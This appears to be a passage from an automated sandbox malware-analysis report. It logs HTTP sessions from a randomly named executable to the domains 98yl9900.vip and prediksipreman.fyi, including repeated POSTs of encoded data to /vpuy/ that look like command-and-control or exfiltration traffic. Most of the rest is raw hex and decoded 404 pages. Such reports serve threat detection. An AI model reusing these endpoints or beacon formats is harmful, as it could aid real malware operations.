2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                        Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                        Nov 4, 2024 10:11:28.863238096 CET212INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                        Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info {
                                                        Nov 4, 2024 10:11:28.863328934 CET1236INData Raw: 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20
                                                        Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0;
                                                        Nov 4, 2024 10:11:28.863601923 CET1236INData Raw: 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20
                                                        Data Ascii: fo-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img {
                                                        Nov 4, 2024 10:11:28.863614082 CET1236INData Raw: 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b
                                                        Data Ascii: er address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
                                                        Nov 4, 2024 10:11:28.863626003 CET636INData Raw: 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f
                                                        Data Ascii: fRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4
                                                        Nov 4, 2024 10:11:28.864270926 CET1236INData Raw: 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73
                                                        Data Ascii: chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPe
                                                        Nov 4, 2024 10:11:28.864285946 CET1236INData Raw: 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55
                                                        Data Ascii: us8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD
                                                        Nov 4, 2024 10:11:28.864300966 CET1236INData Raw: 58 74 65 65 43 56 37 5a 6a 67 2f 77 75 61 38 59 47 6c 33 58 76 44 55 50 79 2f 63 2f 41 76 64 34 2f 68 4e 44 53 71 65 67 51 41 41 41 41 42 4a 52 55 35 45 72 6b 4a 67 67 67 3d 3d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20
                                                        Data Ascii: XteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; } .status-reason
                                                        Nov 4, 2024 10:11:28.864973068 CET846INData Raw: 69 6e 66 6f 2d 69 6d 61 67 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 68 65 61 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: info-image" /> <div class="info-heading"> www.prediksipreman.fyi/cp_errordocument.shtml (port 80) </div> </li>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449940104.21.3.144805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:33.951836109 CET732OUTPOST /vpuy/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.98yl9900.vip
                                                        Origin: http://www.98yl9900.vip
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.98yl9900.vip/vpuy/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 4c 71 4a 48 4d 65 43 31 67 33 43 2f 77 4c 65 76 38 34 5a 63 6d 36 56 68 63 43 32 7a 61 77 4f 57 6c 72 2f 4a 73 49 47 74 31 46 68 2b 2b 75 4f 71 75 52 35 75 67 56 73 58 50 4d 2b 71 36 31 43 2b 73 79 6a 4c 7a 42 66 6a 73 51 2f 75 4e 4f 63 44 79 67 39 47 42 55 33 52 52 77 45 6b 65 34 78 4f 46 42 33 70 6d 66 52 52 62 5a 4c 67 49 56 2f 47 34 55 43 4b 71 78 56 77 70 4f 38 39 36 42 69 56 67 2b 30 6b 56 79 2b 2b 4b 64 76 54 53 6e 56 6f 34 35 45 44 76 36 35 4f 62 2f 58 48 32 74 41 4c 63 62 47 51 30 2b 65 56 55 6e 52 58 71 6f 37 52 36 45 4a 6d 37 70 68 49 45 62 2b 33 66 2f 67 39 38 51 3d 3d
                                                        Data Ascii: Q8r=LqJHMeC1g3C/wLev84Zcm6VhcC2zawOWlr/JsIGt1Fh++uOquR5ugVsXPM+q61C+syjLzBfjsQ/uNOcDyg9GBU3RRwEke4xOFB3pmfRRbZLgIV/G4UCKqxVwpO896BiVg+0kVy++KdvTSnVo45EDv65Ob/XH2tALcbGQ0+eVUnRXqo7R6EJm7phIEb+3f/g98Q==
                                                        Nov 4, 2024 10:11:35.035046101 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:11:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: *
                                                        Access-Control-Allow-Headers: *
                                                        Cache-Control: no-cache, private
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8a%2BgM6wUYdfYs8PNGbqae9ic%2F0cASnuO6vF%2FD4T7hbd0s52l6TOvmv3v3cqOV%2B69aR759IZn32lTcMypaSEQxhMCxp60hm9Vm5WC2CvoyQJsFzX1YaKFYpiAl5MzF1qFBktj"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dd37a3868222cd0-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1586&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 31 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 52 cb 6e db 30 10 bc e7 2b a6 ec 55 b2 2c 27 0e 0a 59 36 90 3e 82 f6 d0 a6 a8 93 43 8e b4 b8 92 08 53 5c 81 a4 1d ab 46 ff 3d 90 84 b8 a8 5d 5e c8 59 cc 2c 66 76 99 bf fb fc f0 e9 f1 f9 e7 17 d4 a1 31 ab ab 7c bc 00 20 af 49 aa f1 39 c0 86 82 44 51 4b e7 29 2c c5 d3 e3 7d fc 41 20 39 27 58 d9 d0 52 38 de 70 f0 02 05 db 40 36 2c 85 65 6d 15 1d 22 cb 25 1b c3 2f ff 2a 7d e8 0c ad 70 76 36 ac 3a 1c b1 91 c5 b6 72 bc b3 2a 2e d8 b0 cb f0 be 2c cb 05 de c0 6c 36 5b a0 64 1b 32 a4 b7 ed 21 49 27 73 c4 b2 6d 0d c5 be f3 81 9a 08 1f 8d b6 db ef b2 58 0f f8 9e 6d 88 20 d6 54 31 e1 e9 9b 88 f0 ab b7 cb 11 c4 57 32 7b 0a ba 90 f8 41 3b 12 11 ee 9c 96 26 82 97 d6 c7 9e 9c 2e 17 68 a4 ab b4 cd 30 5d e0 cf d5 b9 e7 49 9f 58 6a 4b 0e c7 13 f3 7a da 1e 7a dd 21 7e d1 2a d4 19 6e a7 43 e5 52 5e a7 38 9e 82 a9 e2 7a 7e 33 1f b3 c5 5e ff a6 0c b3 9b 41 97
                                                        Data Ascii: 17dlRn0+U,'Y6>CS\F=]^Y,fv1| I9DQK),}A 9'XR8p@6,em"%/*}pv6:r*.,l6[d2!I'smXm T1W2{A;&.h0]IXjKzz!~*nCR^8z~3^A
                                                        Nov 4, 2024 10:11:35.035157919 CET109INData Raw: 27 e3 c4 c6 3d 25 7f 17 95 f7 33 5b 5d b4 3d 0d 5a e9 3d 0a 23 bd 5f 8a 93 51 f1 7f 7e 5e a7 ab 35 3b d7 45 08 35 a1 95 15 a1 e3 1d a4 23 18 e6 ad b6 15 4a 76 28 78 67 14 2c 07 6c 08 65 bf a6 49 9e d4 e9 65 d3 3c 51 7a ff 66 79 f4 99 27 c3 77 7b
                                                        Data Ascii: '=%3[]=Z=#_Q~^5;E5#Jv(xg,leIe<Qzfy'w{a0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449953104.21.3.144805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:36.500694036 CET752OUTPOST /vpuy/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.98yl9900.vip
                                                        Origin: http://www.98yl9900.vip
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.98yl9900.vip/vpuy/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 4c 71 4a 48 4d 65 43 31 67 33 43 2f 32 72 75 76 36 62 68 63 68 61 56 69 59 79 32 7a 55 51 4f 53 6c 72 7a 4a 73 4a 54 32 32 33 56 2b 2f 4d 47 71 2f 6c 4e 75 6a 56 73 58 41 63 2b 6c 31 56 43 4c 73 79 6e 6c 7a 42 54 6a 73 51 62 75 4e 50 73 44 79 54 6c 46 4f 6b 33 54 45 67 45 6d 51 59 78 4f 46 42 33 70 6d 66 46 37 62 64 6e 67 4a 6b 50 47 71 6c 43 4a 67 52 56 78 2f 65 38 39 2b 42 6a 63 67 2b 30 53 56 78 37 62 4b 62 6a 54 53 6d 6c 6f 35 74 59 63 36 4b 35 49 47 76 58 5a 37 64 74 59 44 36 50 76 33 38 33 33 64 33 6c 78 72 75 32 4c 72 31 6f 78 70 70 46 37 5a 63 33 44 53 38 64 30 6e 53 45 54 70 39 76 47 30 34 6e 6e 6e 7a 47 39 55 7a 7a 4d 38 74 45 3d
                                                        Data Ascii: Q8r=LqJHMeC1g3C/2ruv6bhchaViYy2zUQOSlrzJsJT223V+/MGq/lNujVsXAc+l1VCLsynlzBTjsQbuNPsDyTlFOk3TEgEmQYxOFB3pmfF7bdngJkPGqlCJgRVx/e89+Bjcg+0SVx7bKbjTSmlo5tYc6K5IGvXZ7dtYD6Pv3833d3lxru2Lr1oxppF7Zc3DS8d0nSETp9vG04nnnzG9UzzM8tE=
                                                        Nov 4, 2024 10:11:37.604165077 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:11:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: *
                                                        Access-Control-Allow-Headers: *
                                                        Cache-Control: no-cache, private
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUcaFe%2FdHGjO4EE5aQE8Q2cfNg3%2BfoN%2BitF4jHZz%2BcWKRtidLntiPEW4JpsscEmo3yb0%2Beil%2BUzppnNdGk46G3KLS%2F25D%2BJOREAB1ey38abzcC0XSRFXdRaaXkqqtQHobqXC"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dd37a48af0fe987-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1180&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 31 38 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 52 cb 6e db 30 10 bc e7 2b a6 ec 55 b2 2c 27 0e 0a 59 36 90 3e 82 f6 d0 a6 a8 93 43 8e b4 b8 92 08 53 5c 81 a4 1d ab 46 ff 3d 90 84 b8 a8 5d 5e c8 59 cc 2c 66 76 99 bf fb fc f0 e9 f1 f9 e7 17 d4 a1 31 ab ab 7c bc 00 20 af 49 aa f1 39 c0 86 82 44 51 4b e7 29 2c c5 d3 e3 7d fc 41 20 39 27 58 d9 d0 52 38 de 70 f0 02 05 db 40 36 2c 85 65 6d 15 1d 22 cb 25 1b c3 2f ff 2a 7d e8 0c ad 70 76 36 ac 3a 1c b1 91 c5 b6 72 bc b3 2a 2e d8 b0 cb f0 be 2c cb 05 de c0 6c 36 5b a0 64 1b 32 a4 b7 ed 21 49 27 73 c4 b2 6d 0d c5 be f3 81 9a 08 1f 8d b6 db ef b2 58 0f f8 9e 6d 88 20 d6 54 31 e1 e9 9b 88 f0 ab b7 cb 11 c4 57 32 7b 0a ba 90 f8 41 3b 12 11 ee 9c 96 26 82 97 d6 c7 9e 9c 2e 17 68 a4 ab b4 cd 30 5d e0 cf d5 b9 e7 49 9f 58 6a 4b 0e c7 13 f3 7a da 1e 7a dd 21 7e d1 2a d4 19 6e a7 43 e5 52 5e a7 38 9e 82 a9 e2 7a 7e 33 1f b3 c5
                                                        Data Ascii: 187lRn0+U,'Y6>CS\F=]^Y,fv1| I9DQK),}A 9'XR8p@6,em"%/*}pv6:r*.,l6[d2!I'smXm T1W2{A;&.h0]IXjKzz!~*nCR^8z~3
                                                        Nov 4, 2024 10:11:37.604201078 CET112INData Raw: 5e ff a6 0c b3 9b 41 97 27 e3 c4 c6 3d 25 7f 17 95 f7 33 5b 5d b4 3d 0d 5a e9 3d 0a 23 bd 5f 8a 93 51 f1 7f 7e 5e a7 ab 35 3b d7 45 08 35 a1 95 15 a1 e3 1d a4 23 18 e6 ad b6 15 4a 76 28 78 67 14 2c 07 6c 08 65 bf a6 49 9e d4 e9 65 d3 3c 51 7a ff
                                                        Data Ascii: ^A'=%3[]=Z=#_Q~^5;E5#Jv(xg,leIe<Qzfy'w{0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449965104.21.3.144805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:39.048511982 CET10834OUTPOST /vpuy/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.98yl9900.vip
                                                        Origin: http://www.98yl9900.vip
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.98yl9900.vip/vpuy/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 4c 71 4a 48 4d 65 43 31 67 33 43 2f 32 72 75 76 36 62 68 63 68 61 56 69 59 79 32 7a 55 51 4f 53 6c 72 7a 4a 73 4a 54 32 32 33 74 2b 2b 35 53 71 74 30 4e 75 69 56 73 58 44 63 2b 6d 31 56 43 73 73 79 66 68 7a 42 76 5a 73 53 54 75 66 63 6b 44 37 43 6c 46 5a 30 33 54 47 67 45 6a 65 34 77 55 46 42 6d 69 6d 66 56 37 62 64 6e 67 4a 6e 58 47 39 6b 43 4a 7a 42 56 77 70 4f 38 78 36 42 69 35 67 2b 4e 6e 56 79 57 75 4b 72 44 54 56 47 31 6f 36 59 45 63 34 71 35 4b 46 76 57 4b 37 64 67 41 44 2b 6d 63 33 35 69 61 64 30 35 78 71 4a 7a 54 73 47 45 72 39 6f 31 37 4f 76 44 4c 65 50 68 50 6a 77 4d 74 70 4e 54 6b 71 4d 7a 55 74 42 66 72 46 78 66 79 6c 70 6f 53 39 51 34 4a 69 45 36 43 50 30 51 45 78 44 45 48 67 73 55 42 4c 32 69 49 73 61 32 67 6b 2b 47 6e 52 78 4f 5a 75 62 7a 68 6a 4c 70 4a 33 4c 70 73 41 44 69 6d 77 72 57 36 65 34 6b 4c 4c 30 46 77 63 37 31 36 44 69 6e 4d 42 6b 59 64 50 78 63 30 71 51 50 6d 37 5a 71 35 62 45 41 75 50 71 43 77 64 6f 65 4f 5a 4f 2b 37 4d 7a 46 79 42 72 71 6b 70 71 61 2f 78 61 [TRUNCATED]
                                                        Data Ascii: Q8r=LqJHMeC1g3C/2ruv6bhchaViYy2zUQOSlrzJsJT223t++5Sqt0NuiVsXDc+m1VCssyfhzBvZsSTufckD7ClFZ03TGgEje4wUFBmimfV7bdngJnXG9kCJzBVwpO8x6Bi5g+NnVyWuKrDTVG1o6YEc4q5KFvWK7dgAD+mc35iad05xqJzTsGEr9o17OvDLePhPjwMtpNTkqMzUtBfrFxfylpoS9Q4JiE6CP0QExDEHgsUBL2iIsa2gk+GnRxOZubzhjLpJ3LpsADimwrW6e4kLL0Fwc716DinMBkYdPxc0qQPm7Zq5bEAuPqCwdoeOZO+7MzFyBrqkpqa/xaG0u2O030fi1RgUhhoW9Kl25+2vcWUIHPYvh3xjhmyOYyWPQTMfBg3SkdqAWSbHgYLIBAu6CWCI0niF5cDVrHUnGcZMbfjB8++7ocIuui4SweU0TINuVCfXfhlVcYmO31g6o1znGakyXlH6BDFG5zGQnhGuL2Cmh14Zr4vIlRLOBBXDZG5CzTPlboXXNct13pF0Jz+7PpUT5B6kguwhdXLc/R5N+Rz6HmeTqkKboJi8E//cYTfvc5/ehmLMgMuYbF/8SGwlVZflCx4akmfwgngUyAiFmK3RIeCDkl/U+yMq0RKWVTr1WgT6Y/Y6gChJFtTyi0i5Op6zje1qvyNFuyaqXV0BUhKZ1ngUvibQfOP8LcAb9PXvLwUsPxloszoRCzp1MYFbbcZIgJovk9JnacOyeEUF/sgslEpkso5Ky1jGQkcyho/3JkgyjE3yUmjrspwAKYgJRN0dGPGwBUV1yZdZ8lk9AUNyldm9qmNR+xPP4CKAwiKiauD6d4aG2LBA2GbaTwUuDfzzHOgrhYwEleYLomn3I6y31mnCHHNbBd1w3s7Ac9jSHCgMKZ6g5bRvYXYx04h0PMly6lMOPIZB+PY/mIea7fDnwteSN9ViTRnfN8IDAeA7erdscT1pFumsU9sXhKEnwbrK51Iygetb/ScbldcsB3VDCV/y [TRUNCATED]
                                                        Nov 4, 2024 10:11:40.092001915 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:11:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: *
                                                        Access-Control-Allow-Headers: *
                                                        Cache-Control: no-cache, private
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bA%2BQeFHZwtuMrBlHNa3ZN%2FfcDy5nkorib22UOKIb3feyeEbZslsV01SE%2B3Zti%2FtZcEFlLmAnpGgV63EkzNtFN3rP9iV5r2aHU4McusmCMQY2V0DbpL6ZbN%2BohMr2n6YtsZG0"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dd37a5859fa4779-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1562&sent=6&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 31 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 52 cb 6e db 30 10 bc e7 2b a6 ec 55 b2 2c 27 0e 0a 59 36 90 3e 82 f6 d0 a6 a8 93 43 8e b4 b8 92 08 53 5c 81 a4 1d ab 46 ff 3d 90 84 b8 a8 5d 5e c8 59 cc 2c 66 76 99 bf fb fc f0 e9 f1 f9 e7 17 d4 a1 31 ab ab 7c bc 00 20 af 49 aa f1 39 c0 86 82 44 51 4b e7 29 2c c5 d3 e3 7d fc 41 20 39 27 58 d9 d0 52 38 de 70 f0 02 05 db 40 36 2c 85 65 6d 15 1d 22 cb 25 1b c3 2f ff 2a 7d e8 0c ad 70 76 36 ac 3a 1c b1 91 c5 b6 72 bc b3 2a 2e d8 b0 cb f0 be 2c cb 05 de c0 6c 36 5b a0 64 1b 32 a4 b7 ed 21 49 27 73 c4 b2 6d 0d c5 be f3 81 9a 08 1f 8d b6 db ef b2 58 0f f8 9e 6d 88 20 d6 54 31 e1 e9 9b 88 f0 ab b7 cb 11 c4 57 32 7b 0a ba 90 f8 41 3b 12 11 ee 9c 96 26 82 97 d6 c7 9e 9c 2e 17 68 a4 ab b4 cd 30 5d e0 cf d5 b9 e7 49 9f 58 6a 4b 0e c7 13 f3 7a da 1e 7a dd 21 7e d1 2a d4 19 6e a7 43 e5 52 5e a7 38 9e 82 a9 e2 7a 7e 33 1f b3 c5 5e ff a6
                                                        Data Ascii: 17dlRn0+U,'Y6>CS\F=]^Y,fv1| I9DQK),}A 9'XR8p@6,em"%/*}pv6:r*.,l6[d2!I'smXm T1W2{A;&.h0]IXjKzz!~*nCR^8z~3^
                                                        Nov 4, 2024 10:11:40.092114925 CET109INData Raw: 0c b3 9b 41 97 27 e3 c4 c6 3d 25 7f 17 95 f7 33 5b 5d b4 3d 0d 5a e9 3d 0a 23 bd 5f 8a 93 51 f1 7f 7e 5e a7 ab 35 3b d7 45 08 35 a1 95 15 a1 e3 1d a4 23 18 e6 ad b6 15 4a 76 28 78 67 14 2c 07 6c 08 65 bf a6 49 9e d4 e9 65 d3 3c 51 7a ff 66 79 f4
                                                        Data Ascii: A'=%3[]=Z=#_Q~^5;E5#Jv(xg,leIe<Qzfy'w{a
                                                        Nov 4, 2024 10:11:40.092125893 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449978104.21.3.144805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:41.607145071 CET464OUTGET /vpuy/?Q8r=GohnPojKoDSo26eExaRPtq0fYHz1awKnkuX4rqCOwHJs0Om2tBI/qHVUK+LhjFCYnUGrzAuj4BG5Iu5ezVBqMm60AjojQL4Je3zYgtUuMeqMe2LW7C+ksjQ=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.98yl9900.vip
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:11:42.714726925 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:11:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: *
                                                        Access-Control-Allow-Headers: *
                                                        Cache-Control: no-cache, private
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vsqhK5HbgmiABFpHGXz9FepJoljrfOBzgYHqweAOGTdPN45yzrZEQn%2BlzdT4fVfqfLEVlResxX%2BDDOCgsB05jvPTRT%2FcIj9%2FAYMlUlDu1jp96hKWCd1XaZe38U%2FYtqYIkr7S"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dd37a68bce26c6e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=464&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
